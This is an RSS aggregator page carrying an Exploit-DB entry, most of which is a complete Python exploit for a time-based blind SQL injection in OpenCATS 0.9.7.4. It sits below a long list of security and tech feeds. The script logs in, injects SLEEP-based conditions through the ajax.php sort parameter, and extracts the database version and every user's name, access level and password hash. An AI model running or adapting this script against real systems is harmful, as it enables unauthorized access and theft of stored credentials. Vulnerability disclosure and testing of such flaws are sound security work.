惯性聚合 高效追踪和阅读你感兴趣的博客、新闻、科技资讯
阅读原文 在惯性聚合中打开

推荐订阅源

cs.AI updates on arXiv.org
cs.AI updates on arXiv.org
V
Vulnerabilities – Threatpost
Security Latest
Security Latest
T
Threatpost
L
Lohrmann on Cybersecurity
Know Your Adversary
Know Your Adversary
Cyberwarzone
Cyberwarzone
S
Securelist
A
Arctic Wolf
W
WeLiveSecurity
Help Net Security
Help Net Security
Last Week in AI
Last Week in AI
H
Hacker News: Front Page
freeCodeCamp Programming Tutorials: Python, JavaScript, Git & More
大猫的无限游戏
大猫的无限游戏
博客园 - 聂微东
博客园_首页
NISL@THU
NISL@THU
N
News and Events Feed by Topic
博客园 - 【当耐特】
S
Schneier on Security
阮一峰的网络日志
阮一峰的网络日志
Cloudbric
Cloudbric
P
Privacy International News Feed
小众软件
小众软件
OSCHINA 社区最新新闻
OSCHINA 社区最新新闻
K
KPMG report finds enterprise disconnect between AI and its ROI | CIO
宝玉的分享
宝玉的分享
Latest news
Latest news
美团技术团队
T
The Exploit Database - CXSecurity.com
S
Security Affairs
月光博客
月光博客
M
MIT News - Artificial intelligence
GbyAI
GbyAI
D
Docker
IT之家
IT之家
PCI Perspectives
PCI Perspectives
Application and Cybersecurity Blog
Application and Cybersecurity Blog
K
Kaspersky official blog
WordPress大学
WordPress大学
V2EX - 技术
V2EX - 技术
L
LINUX DO - 最新话题
P
Proofpoint News Feed
Google Online Security Blog
Google Online Security Blog
C
CERT Recently Published Vulnerability Notes
奇客Solidot–传递最新科技情报
奇客Solidot–传递最新科技情报
C
Cyber Attacks, Cyber Crime and Cyber Security
J
Java Code Geeks
I
InfoQ

Exploit-DB.com RSS Feed

MEmu Android Emulator 9.2.7.0 - Local Privilege Escalation OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive
OffSec’s Exploit Database Archive
Gabriel Rodrigues · 2026-05-27 · via Exploit-DB.com RSS Feed
# Exploit Title: OpenCATS 0.9.7.4 - SQL Injection
# Exploit Author: Gabriel Rodrigues (TEXUGO) from HAKAI
# Vendor Homepage: https://www.opencats.org
# Software Link: https://github.com/opencats/OpenCATS
# Version: <= 0.9.7.4
# Tested on: Ubuntu 22.04 / Apache2 / PHP / MariaDB 10.6
# CVE: N/A (GHSA-8mc8-5gw6-c7w4)
import requests, json, sys, time

url   = sys.argv[1] if len(sys.argv) > 1 else "http://localhost:8888"
user  = sys.argv[2] if len(sys.argv) > 2 else "admin"
pw    = sys.argv[3] if len(sys.argv) > 3 else "cats"
delay = 1.5

s = requests.Session()
s.get(f"{url}/index.php")
s.post(f"{url}/index.php?m=login&a=attemptLogin", data={"username": user, "password": pw}, allow_redirects=True)

def sqli(payload):
    t = time.time()
    s.get(f"{url}/ajax.php", timeout=30, params={"f": "getDataGridPager",
        "i": "candidates:candidatesListByViewDataGrid",
        "p": json.dumps({"sortBy": "dateModifiedSort", "sortDirection": payload, "rangeStart": 0, "maxResults": 15})})
    return time.time() - t

def blind(cond):
    return sqli(f"DESC,IF(({cond}),SLEEP({delay}),0)") > delay * 0.6

def extract(query, maxlen=100):
    out = ""
    for i in range(1, maxlen + 1):
        if blind(f"LENGTH({query})<{i}"): break
        lo, hi = 32, 126
        while lo < hi:
            mid = (lo + hi) // 2
            lo, hi = (mid + 1, hi) if blind(f"ORD(SUBSTRING({query},{i},1))>{mid}") else (lo, mid)
        out += chr(lo)
    return out

base = sqli("DESC")
slp  = sqli("DESC,SLEEP(2)")
print(f"baseline={base:.2f}s  sleep(2)={slp:.2f}s")
assert slp > base + 1, "not vulnerable or no candidate rows"
print("injection confirmed\n")

print("version:", extract("@@version", 30))
print("database:", extract("DATABASE()", 20))

n = int(extract("(SELECT COUNT(*) FROM user)", 3))
print(f"users: {n}\n")
for i in range(n):
    name  = extract(f"(SELECT user_name FROM user ORDER BY user_id LIMIT {i},1)", 40)
    level = extract(f"(SELECT access_level FROM user ORDER BY user_id LIMIT {i},1)", 5)
    hash_ = extract(f"(SELECT password FROM user ORDER BY user_id LIMIT {i},1)", 62)
    print(f"  {name}  level={level}  hash={hash_}")